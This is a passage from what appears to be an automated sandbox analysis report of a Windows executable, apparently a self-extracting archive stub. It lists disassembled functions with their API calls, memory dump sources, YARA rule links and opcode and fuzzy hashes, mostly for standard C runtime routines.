                                                                                                                    • Instruction Fuzzy Hash: E6317D726443455ADA30AF94BC42B7B73E4EB90364F50581FF986772C2FB60AD8893A1
                                                                                                                    Function 00E4AAC9 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 77COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetDC.USER32(00000000), ref: 00E4AAD2
                                                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 00E4AB01
                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 00E4AB99
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ObjectRelease
                                                                                                                    • String ID: -$7$
                                                                                                                    • API String ID: 1429681911-575736043
                                                                                                                    • Opcode ID: 16165c50cd15777385eff388e1c12618b39e5047f0846fdca68c4f32886b7627
                                                                                                                    • Instruction ID: 56d35c632445564560fdffacbced3b59cc1ef20ec22c5f09401026ec567dd860
                                                                                                                    • Opcode Fuzzy Hash: 16165c50cd15777385eff388e1c12618b39e5047f0846fdca68c4f32886b7627
                                                                                                                    • Instruction Fuzzy Hash: 6321FA76108304AFD3019FA6DC48E6FBFE9FB89355F04092BFA45A2120D7319A589B62
                                                                                                                    Function 00E5C8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00E5C868: _free.LIBCMT ref: 00E5C891
                                                                                                                    • _free.LIBCMT ref: 00E5C8F2
                                                                                                                      • Part of subcall function 00E58DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00E5C896,?,00000000,?,00000000,?,00E5C8BD,?,00000007,?,?,00E5CCBA,?), ref: 00E58DE2
                                                                                                                      • Part of subcall function 00E58DCC: GetLastError.KERNEL32(?,?,00E5C896,?,00000000,?,00000000,?,00E5C8BD,?,00000007,?,?,00E5CCBA,?,?), ref: 00E58DF4
                                                                                                                    • _free.LIBCMT ref: 00E5C8FD
                                                                                                                    • _free.LIBCMT ref: 00E5C908
                                                                                                                    • _free.LIBCMT ref: 00E5C95C
                                                                                                                    • _free.LIBCMT ref: 00E5C967
                                                                                                                    • _free.LIBCMT ref: 00E5C972
                                                                                                                    • _free.LIBCMT ref: 00E5C97D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 776569668-0
                                                                                                                    • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                                    • Instruction ID: 228e8bc0ab258a105745389cfa67b04acb8dffed4a8d6497fbc22aaca3bbce4e
                                                                                                                    • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                                    • Instruction Fuzzy Hash: 79114F71580B08AAE620B7B1DC07FCB7BEC9F10B02F501C15FB9D76092DA65B54D8750
                                                                                                                    Function 00E4E5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00E4E669,00E4E5CC,00E4E86D), ref: 00E4E605
                                                                                                                    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00E4E61B
                                                                                                                    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00E4E630
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                    • API String ID: 667068680-1718035505
                                                                                                                    • Opcode ID: a730465fe199812acde61c3089d5bff38bb8ba59a2901ea1f7d00b6b9a5d1466
                                                                                                                    • Instruction ID: 1435362fa95f546f9a47d4c14ee3ef6095c0f4ac7de450353d9ab4f58774a37b
                                                                                                                    • Opcode Fuzzy Hash: a730465fe199812acde61c3089d5bff38bb8ba59a2901ea1f7d00b6b9a5d1466
                                                                                                                    • Instruction Fuzzy Hash: 95F0C2327803629F0F214E767C885A6A2C97B25799B0235FED902F3340EB60CC585B90
                                                                                                                    Function 00E58900 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 00E5891E
                                                                                                                      • Part of subcall function 00E58DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00E5C896,?,00000000,?,00000000,?,00E5C8BD,?,00000007,?,?,00E5CCBA,?), ref: 00E58DE2
                                                                                                                      • Part of subcall function 00E58DCC: GetLastError.KERNEL32(?,?,00E5C896,?,00000000,?,00000000,?,00E5C8BD,?,00000007,?,?,00E5CCBA,?,?), ref: 00E58DF4
                                                                                                                    • _free.LIBCMT ref: 00E58930
                                                                                                                    • _free.LIBCMT ref: 00E58943
                                                                                                                    • _free.LIBCMT ref: 00E58954
                                                                                                                    • _free.LIBCMT ref: 00E58965
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID: p
                                                                                                                    • API String ID: 776569668-2678736219
                                                                                                                    • Opcode ID: ad444a5fa4703c62421b21b4f5902b9bf42ed6c20dd4843ce7db424aeb93daff
                                                                                                                    • Instruction ID: 00d36cee8f51916a7d4e864d147645b7ca7b712a1a8b39a842f63e6c6ace76ed
                                                                                                                    • Opcode Fuzzy Hash: ad444a5fa4703c62421b21b4f5902b9bf42ed6c20dd4843ce7db424aeb93daff
                                                                                                                    • Instruction Fuzzy Hash: 34F01775811226AF8A066F16FE024463BF5B724715300290BFB18723B2DB72494DDB81
                                                                                                                    Function 00E4146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E414C2
                                                                                                                      • Part of subcall function 00E3B146: GetVersionExW.KERNEL32(?), ref: 00E3B16B
                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00E414E6
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E41500
                                                                                                                    • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00E41513
                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E41523
                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E41533
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2092733347-0
                                                                                                                    • Opcode ID: 1f0f0a0240ca6dc0df1737741ac589041428bbc3aa916d5deeb193fa3cc117fa
                                                                                                                    • Instruction ID: f966892720d0169b6e31c5fc4b0acabe0e41fbcc8b46cf1139a60abe3b0ca1f7
                                                                                                                    • Opcode Fuzzy Hash: 1f0f0a0240ca6dc0df1737741ac589041428bbc3aa916d5deeb193fa3cc117fa
                                                                                                                    • Instruction Fuzzy Hash: B4310775108305AFC700DFA9D88499BBBF8BF98754F005A1EF999D3210E730D549CBA6
                                                                                                                    Function 00E52AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(?,?,00E52AF1,00E502FC,00E4FA34), ref: 00E52B08
                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E52B16
                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E52B2F
                                                                                                                    • SetLastError.KERNEL32(00000000,00E52AF1,00E502FC,00E4FA34), ref: 00E52B81
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3852720340-0
                                                                                                                    • Opcode ID: 78022968f9de247f4e590cea935ef94bff657513f9087c281e28ca5cf5408335
                                                                                                                    • Instruction ID: fba5a838627b031444641cd2aebcfd92fb0a9a0cb153e94ed3f560930ecf3668
                                                                                                                    • Opcode Fuzzy Hash: 78022968f9de247f4e590cea935ef94bff657513f9087c281e28ca5cf5408335
                                                                                                                    • Instruction Fuzzy Hash: C401D8361083116DEA652A767C459572BA9EB127FBB602F3EFE10751E0FF516C0C5244
                                                                                                                    Function 00E597E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(?,00E71030,00E54674,00E71030,?,?,00E53F73,00000050,?,00E71030,00000200), ref: 00E597E9
                                                                                                                    • _free.LIBCMT ref: 00E5981C
                                                                                                                    • _free.LIBCMT ref: 00E59844
                                                                                                                    • SetLastError.KERNEL32(00000000,?,00E71030,00000200), ref: 00E59851
                                                                                                                    • SetLastError.KERNEL32(00000000,?,00E71030,00000200), ref: 00E5985D
                                                                                                                    • _abort.LIBCMT ref: 00E59863
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3160817290-0
                                                                                                                    • Opcode ID: 8e03bd6494d2af7308979fc1ac769f97154765577866b5eeef14fc3252677606
                                                                                                                    • Instruction ID: 09af18838667c46ed0890de105978c08b567532340d84bae18d57b68357ae9da
                                                                                                                    • Opcode Fuzzy Hash: 8e03bd6494d2af7308979fc1ac769f97154765577866b5eeef14fc3252677606
                                                                                                                    • Instruction Fuzzy Hash: FEF02D35100601BAC65933357C0AA9B1AE98FD2777F243934FE14B22D3EF60880D4151
                                                                                                                    Function 00E4DC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00E4DC47
                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E4DC61
                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E4DC72
                                                                                                                    • TranslateMessage.USER32(?), ref: 00E4DC7C
                                                                                                                    • DispatchMessageW.USER32(?), ref: 00E4DC86
                                                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00E4DC91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2148572870-0
                                                                                                                    • Opcode ID: b63f12a251f8015e601c1b8ffb85a782afc2fcb685f4ccca7c2bcbc656b7b6a2
                                                                                                                    • Instruction ID: f9a24e96c195be64dcedf29e901e9b5f029644cf4c4d5829a8c4019797c54aa3
                                                                                                                    • Opcode Fuzzy Hash: b63f12a251f8015e601c1b8ffb85a782afc2fcb685f4ccca7c2bcbc656b7b6a2
                                                                                                                    • Instruction Fuzzy Hash: 32F03C72A01219BBCB206BA6EC4DDCBBF7DEF42795F004012F51AF2061D674864AC7A0
                                                                                                                    Function 00E4A80C Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00E4A699: GetDC.USER32(00000000), ref: 00E4A69D
                                                                                                                      • Part of subcall function 00E4A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E4A6A8
                                                                                                                      • Part of subcall function 00E4A699: ReleaseDC.USER32(00000000,00000000), ref: 00E4A6B3
                                                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 00E4A83C
                                                                                                                      • Part of subcall function 00E4AAC9: GetDC.USER32(00000000), ref: 00E4AAD2
                                                                                                                      • Part of subcall function 00E4AAC9: GetObjectW.GDI32(?,00000018,?), ref: 00E4AB01
                                                                                                                      • Part of subcall function 00E4AAC9: ReleaseDC.USER32(00000000,?), ref: 00E4AB99
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ObjectRelease$CapsDevice
                                                                                                                    • String ID: "$($A
                                                                                                                    • API String ID: 1061551593-2217482528
                                                                                                                    • Opcode ID: 6da4bf33a70e138e6a7e211138d7e6b135ba8d94fb01d44a3d9e05b004f39e09
                                                                                                                    • Instruction ID: b78be8e792b8fdaa66e092b2932afaf14439f6df8526d6896eef550074583992
                                                                                                                    • Opcode Fuzzy Hash: 6da4bf33a70e138e6a7e211138d7e6b135ba8d94fb01d44a3d9e05b004f39e09
                                                                                                                    • Instruction Fuzzy Hash: 2A91F371204344AFD614DF25E84492BBBF8FFC8750F04591EF59AE3260DB70A905CB62
                                                                                                                    Function 00E3C0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00E405DA: _wcslen.LIBCMT ref: 00E405E0
                                                                                                                      • Part of subcall function 00E3B92D: _wcsrchr.LIBVCRUNTIME ref: 00E3B944
                                                                                                                    • _wcslen.LIBCMT ref: 00E3C197
                                                                                                                    • _wcslen.LIBCMT ref: 00E3C1DF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$_wcsrchr
                                                                                                                    • String ID: .exe$.rar$.sfx
                                                                                                                    • API String ID: 3513545583-31770016
                                                                                                                    • Opcode ID: f329b9ea51dcc42c473b3efb0b8eec052b7dd50249802cb5708e7d280378bc5f
                                                                                                                    • Instruction ID: 0ce3e53b152dc9cf3cd8336baa0660943f67d72a94d137bdb59254d5cb752be1
                                                                                                                    • Opcode Fuzzy Hash: f329b9ea51dcc42c473b3efb0b8eec052b7dd50249802cb5708e7d280378bc5f
                                                                                                                    • Instruction Fuzzy Hash: FF416A2654035195C736AF74984AA7BBBF4EF44748F30390EF9927B082EB60CD81D791
                                                                                                                    Function 00E3BB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _wcslen.LIBCMT ref: 00E3BB27
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00E3A275,?,?,00000800,?,00E3A23A,?,00E3755C), ref: 00E3BBC5
                                                                                                                    • _wcslen.LIBCMT ref: 00E3BC3B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$CurrentDirectory
                                                                                                                    • String ID: UNC$\\?\
                                                                                                                    • API String ID: 3341907918-253988292
                                                                                                                    • Opcode ID: ae237938659bf9669b88b6f59aaf57c6831fffd8c04afa31510acf90f39f1431
                                                                                                                    • Instruction ID: acfdad8bd1794f32d237206d75816f66cc5e5d977adbbff2d83b472bcb80793d
                                                                                                                    • Opcode Fuzzy Hash: ae237938659bf9669b88b6f59aaf57c6831fffd8c04afa31510acf90f39f1431
                                                                                                                    • Instruction Fuzzy Hash: B541C331440215A6CF31AF60DC4AEEABBE8AF80394F01B565FA56F3151DB74DE90CB60
                                                                                                                    Function 00E4CD58 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 103COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 00E4CD84
                                                                                                                      • Part of subcall function 00E4AF98: _wcschr.LIBVCRUNTIME ref: 00E4B033
                                                                                                                      • Part of subcall function 00E41FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00E3C116,00000000,.exe,?,?,00000800,?,?,?,00E48E3C), ref: 00E41FD1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcschr$CompareString
                                                                                                                    • String ID: <$HIDE$MAX$MIN
                                                                                                                    • API String ID: 69343711-3358265660
                                                                                                                    • Opcode ID: 4b3dfca839a757bed1a21e7e00743dc1ea642b06e98f3e89adcedb647ac226df
                                                                                                                    • Instruction ID: 88700766dd1345a1c58bf6b2300aae198a7c9cb8dde83d94f65325bb6d59cf6e
                                                                                                                    • Opcode Fuzzy Hash: 4b3dfca839a757bed1a21e7e00743dc1ea642b06e98f3e89adcedb647ac226df
                                                                                                                    • Instruction Fuzzy Hash: 4031A372A00209AADF25CB60EC41EFE73FCEB15354F505566E901F7180EBB09E848FA1
                                                                                                                    Function 00E3B991 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _swprintf.LIBCMT ref: 00E3B9B8
                                                                                                                      • Part of subcall function 00E34092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E340A5
                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 00E3B9D6
                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 00E3B9E6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
